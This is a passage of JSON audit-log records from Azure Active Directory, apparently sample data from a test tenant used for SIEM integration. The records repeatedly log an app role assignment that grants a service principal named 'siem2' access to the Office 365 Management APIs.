"[{\"ObjectID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"DisplayName\":\"siem2\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Name\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, 
{"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:45:41.9571526Z"}, {"Name": "env_epoch", "Value": "748B6"}, {"Name": "env_seqNum", "Value": "34622781"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR571"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add app role assignment to service principal.", "Id": "a4a12952-3467-4d48-9950-48b4b9ac87b3"} -{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:45:41", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": 
"AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": "siem2"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "OldValue": "", "Name": "TargetId.ServicePrincipalNames"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": 
"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "1e80f57e-764e-4c42-bead-7ccf998fe780"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"DisplayName\":\"siem2\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Name\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:45:41.8821342Z"}, {"Name": "env_epoch", "Value": "748B6"}, {"Name": "env_seqNum", "Value": "34622751"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", 
"Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR571"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add app role assignment to service principal.", "Id": "411fc666-cabf-4cb0-b8a3-e5a2cc515b79"} -{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:45:41", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Name": 
"ServicePrincipal.DisplayName", "OldValue": "", "NewValue": "siem2"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"NewValue": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", "OldValue": "", "Name": "ServicePrincipal.Name"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "1e80f57e-764e-4c42-bead-7ccf998fe780"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": 
"[{\"ObjectID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"DisplayName\":\"siem2\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Name\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:45:41.9571526Z"}, {"Name": "env_epoch", "Value": "748B6"}, {"Name": "env_seqNum", "Value": "34622781"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR571"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add app role assignment to service principal.", "Id": "a4a12952-3467-4d48-9950-48b4b9ac87b3"} -{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:45:41", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": 
"755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": "siem2"}, {"NewValue": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", "OldValue": "", "Name": "ServicePrincipal.AppId"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": 
"755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "1e80f57e-764e-4c42-bead-7ccf998fe780"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"DisplayName\":\"siem2\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Name\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:45:41.8821342Z"}, {"Name": "env_epoch", "Value": "748B6"}, {"Name": "env_seqNum", "Value": "34622751"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": 
"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR571"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add app role assignment to service principal.", "Id": "411fc666-cabf-4cb0-b8a3-e5a2cc515b79"} -{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:45:41", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": 
"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": "siem2"}, {"NewValue": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", "OldValue": "", "Name": "ServicePrincipal.AppId"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "OldValue": "", "Name": "TargetId.ServicePrincipalNames"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": 
"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "1e80f57e-764e-4c42-bead-7ccf998fe780"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"DisplayName\":\"siem2\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Name\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:45:41.8071361Z"}, {"Name": "env_epoch", "Value": "748B6"}, {"Name": "env_seqNum", "Value": "34622707"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR571"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": 
"env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add app role assignment to service principal.", "Id": "256e3859-87ca-4b23-b2c0-45a26ccd7925"} -{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:45:41", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"NewValue": "siem2", "OldValue": "", "Name": "ServicePrincipal.DisplayName"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": 
"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "OldValue": "", "Name": "TargetId.ServicePrincipalNames"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "1e80f57e-764e-4c42-bead-7ccf998fe780"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"DisplayName\":\"siem2\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Name\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"}]"}, {"Name": "additionalDetails", "Value": 
